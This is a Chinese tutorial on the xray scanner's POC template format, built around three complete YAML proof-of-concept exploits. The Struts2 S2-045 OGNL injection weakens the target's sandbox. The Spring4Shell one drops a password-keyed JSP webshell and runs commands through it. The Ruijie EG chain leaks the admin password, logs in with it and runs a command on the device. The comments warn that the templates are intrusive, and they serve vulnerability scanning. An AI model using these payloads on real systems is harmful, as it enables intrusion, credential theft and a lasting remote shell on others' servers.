xray-poc-模板

groups

groups 下可定义多组请求(下例中的 poc1、poc2),各组分别运行;只要任意一组的 expression 成立,即判定漏洞存在。

---
# xray v1 "groups" POC for Apache Struts 2 S2-045: OGNL is injected through the
# Content-Type header. If either group's expression holds, xray reports the
# target as vulnerable.
name: poc-yaml-struts2_045

set:
  # Two random factors; only their product is accepted as proof, so a stray
  # header or a static page cannot produce a false positive.
  r1: randomInt(800, 1000)
  r2: randomInt(800, 1000)

groups:
  # Group 1 (least intrusive): have the server add a response header whose
  # value is r1*r2 and look for that product in the reply.
  poc1:
    - method: GET
      path: /
      headers:
        Content-Type: '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data'
      follow_redirects: true
      expression: |
        "Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))

  # Group 2: switch OGNL to DEFAULT_MEMBER_ACCESS, empty OgnlUtil's excluded
  # package/class lists, then write a marker into the response body.
  # The marker is printed in two pieces ('struts2_security_' + 'check'),
  # presumably so the full string is not present in the request itself; the
  # expression matches the joined text.
  # NOTE(review): clearing getExcludedPackageNames()/getExcludedClasses() on the
  # container-scoped OgnlUtil instance is not undone by this POC, so the
  # weakened sandbox likely persists in the target JVM until restart — treat
  # this group as intrusive, not a pure read-only probe.
  poc2:
    - method: GET
      path: /
      headers:
        Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}"
      follow_redirects: true
      expression: |
        response.body.bcontains(b"struts2_security_check")

detail:
  # Placeholder metadata copied from the example; fill in before publishing.
  author: xx
  description: "xx"

最新的模板格式(rules 写法):在 rules 下定义 rule0、rule1 等规则,并在末尾的 expression 中指定它们的执行顺序。

下例按顺序运行 rule0、rule1 两条请求,运行第一条请求后通过 sleep(10) 等待 10s 再发第二条。注意:该 POC 会在目标上写入 tomcatwar.jsp webshell(仅以 pwd=j 做校验)且不会自动清理,只应在授权测试中手动运行,并在测试后删除该文件。

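---
# xray v2 "rules" POC for CVE-2022-22965 (Spring Core RCE, "SpringShell").
#
# WARNING — this POC is NOT harmless. rule0 reconfigures Tomcat's
# AccessLogValve through class.module.classLoader.* so that the access log is
# written to webapps/ROOT/tomcatwar.jsp, with the JSP-shell body supplied by
# the c1/c2/suffix request headers (the %{...}i pattern items). rule1 then
# executes `whereis bash` through that shell. Nothing removes the file or
# restores the valve, and the shell's only access control is the hard-coded
# query parameter pwd=j, so a successful run leaves a reachable webshell on
# the target. Delete tomcatwar.jsp and restore the valve configuration after
# testing.
name: poc-yaml-CVE-2022-22965-spring-core-RCE
# Added: keep this POC out of unattended/default scans, as the ruijie POC on
# this page does. (Assumed to mean "run only when explicitly selected" —
# confirm against the xray POC reference.)
manual: true
transport: http

rules:
  rule0:
    # Valve reconfiguration: pattern, suffix, directory, prefix and
    # fileDateFormat are all set in a single request.
    expression: response.status == 200
    request:
      method: POST
      path: /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
      headers:
        # Pieces of the JSP that cannot be placed in the URL directly; the log
        # pattern pulls them in via %{suffix}i, %{c1}i and %{c2}i.
        suffix: '%>//'
        c1: 'Runtime'
        c2: '<%'
        DNT: '1'
        Content-Type: 'application/x-www-form-urlencoded'

  rule1:
    # Hit the dropped JSP. The check looks for fragments of the JSP source
    # ("pwd", "cmd", "getInputStream") rather than for the output of
    # `whereis bash`; presumably the logged line is echoed back in the body —
    # TODO confirm against a known-vulnerable instance.
    expression: response.status == 200 && response.body.bcontains(b"pwd")&& response.body.bcontains(b"cmd")&& response.body.bcontains(b"getInputStream")
    request:
      method: GET
      path: /tomcatwar.jsp?pwd=j&cmd=whereis%20bash

# Run in order; the 10s pause presumably lets Tomcat flush the log line into
# the new file before it is requested.
expression: rule0() && sleep(10) && rule1()

detail:
  author: whale3707
  links:
    - https://github.com/TheGejr/SpringShell
  vulnerability:
    id: CVE-2022-22965-spring-core-RCE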

正则表达式

output
search
在 output 中用 bsubmatch 对 response.body 做正则匹配,正则里的命名分组 (?P<password>...) 就是要提取的内容;把它存到 password 变量后,后面的规则里直接用 {{password}} 引用即可。

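---
# xray v2 "rules" POC for the Ruijie EG gateway cli.php remote command
# execution. Three chained rules: r0 leaks the admin password through the
# login form, r1 logs in with it, r2 runs a benign `expr` via cli.php and
# checks that the product comes back. The template is marked manual
# (presumably because r2 executes an attacker-chosen command on a network
# device); run it only when explicitly selected.
name: poc-yaml-ruijie-eg-cli-rce
manual: true
transport: http

set:
  # Random factors; r2 only passes if exactly their product is echoed.
  r1: randomInt(8000, 10000)
  r2: randomInt(8000, 10000)

rules:
  r0:
    # Step 1 — credential leak. The password field is abused to run
    # `show webmaster user`; the admin password is then present in the JSON
    # reply and captured below. Treat xray's output/logs as sensitive after
    # this step: they contain a live device credential.
    request:
      cache: true
      method: POST
      path: /login.php
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        username=admin&password=admin?show+webmaster+user
    expression: response.status == 200 && response.content_type.contains("text/json")
    output:
      # bsubmatch returns the named captures as a map; the "password" group is
      # exported so r1 can reference it as {{password}}.
      search: '"{\"data\":\".*admin\\s?(?P<password>[^\\\\\"]*)".bsubmatch(response.body)'
      password: search["password"]

  r1:
    # Step 2 — authenticate with the leaked password. Success is an admin
    # session cookie plus the fixed JSON status body.
    request:
      cache: true
      method: POST
      path: /login.php
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        username=admin&password={{password}}
    expression: response.status == 200 && response.content_type.contains("text/json") && response.headers["Set-Cookie"].contains("user=admin") && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")

  r2:
    # Step 3 — command execution through cli.php. The command is a harmless
    # arithmetic probe; the response must echo r1*r2.
    # Fix: Content-Type was missing here although r0/r1 set it; PHP only
    # populates $_POST for form-encoded or multipart requests, so without it
    # `command` may never reach cli.php (harmless if xray already adds it).
    # NOTE(review): the `*` in `expr a * b` is unquoted. If cli.php hands the
    # command to a shell it is subject to glob expansion and can fail in a
    # directory that contains files; `expr a \* b` would be safer, but that is
    # untested against the device, so the payload is left as published.
    request:
      cache: true
      method: POST
      path: /cli.php?a=shell
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        notdelay=true&command=expr {{r1}} * {{r2}}
      follow_redirects: false
    expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))

# Rules run in order; every step must pass before the target is reported.
expression: r0() && r1() && r2()

detail:
  author: Jarcis
  links:
    - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md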